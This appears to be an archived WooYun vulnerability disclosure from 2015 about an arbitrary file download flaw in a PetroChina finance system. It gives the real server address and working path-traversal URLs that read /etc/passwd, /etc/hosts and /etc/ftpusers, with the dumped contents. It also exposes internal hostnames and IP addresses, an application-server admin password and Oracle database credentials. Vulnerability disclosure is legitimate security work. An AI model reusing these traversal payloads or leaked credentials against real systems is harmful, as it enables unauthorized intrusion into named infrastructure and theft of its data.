乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-24: 细节已通知厂商并且等待厂商处理中 2015-03-24: 厂商已经确认,细节仅向厂商公开 2015-04-03: 细节向核心白帽子及相关领域专家公开 2015-04-13: 细节向普通白帽子公开 2015-04-23: 细节向实习白帽子公开 2015-05-08: 细节向公众公开
中国石油某财务系统任意文件下载
url:http://161.207.5.195/NASApp/cpf/distribute/index.jsp
http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/passwd
root:!:0:0::/:/usr/bin/kshdaemon:!:1:1::/etc:bin:!:2:2::/bin:sys:!:3:3::/usr/sys:adm:!:4:4::/var/adm:uucp:!:5:5::/usr/lib/uucp:guest:!:100:100::/home/guest:nobody:!:4294967294:4294967294::/:lpd:!:9:4294967294::/:lp:!:11:11::/var/spool/lp:/bin/falseinvscout:!:6:12::/var/adm/invscout:/usr/bin/kshsnapp:!:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappdipsec:!:201:1::/etc/ipsec:/usr/bin/kshnuucp:!:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucicopconsole:!:8:0::/var/adm/pconsole:/usr/bin/kshesaadmin:!:10:0::/var/esa:/usr/bin/kshsshd:!:202:201::/var/empty:/usr/bin/kshmont:!:204:0::/home/mont:/usr/bin/kshrt:!:12:0::/home/rt:/usr/bin/ksh
http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/host
# Internet Address Hostname # Comments# 192.9.200.1 net0sample # ethernet name/address# 128.100.0.1 token0sample # token ring name/address# 10.2.0.2 x25sample # x.25 name/address# 2000:1:1:1:209:6bff:feee:2b7f ipv6sample # ipv6 name/address127.0.0.1 loopback localhost # loopback (lo0) name/address10.211.209.176 ecdisb410.211.209.172 ecappb210.211.209.171 ecappa210.211.209.174 ecbankb310.8.19.40 devtc1#DLPAR IP192.168.127.5 ecdisb4
http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/ftpusers
#rootdaemonbinsysadmuucpguestnobodylpdlpinvscoutsnappipsecnuucppconsoleesaadminsshd
cd /was/diswas/AppServer/bin./stopServer.sh server1 -username admin -password adminadmin
O AssociatedbURL = jdbc:oracle:thin:@10.21.0.15:1521:dssDB_USERNAME = cwgsDB_PASSWORD = cwgscon
危害等级:高
漏洞Rank:12
确认时间:2015-03-24 15:58
非常感谢您的报告,问题已着手处理。
暂无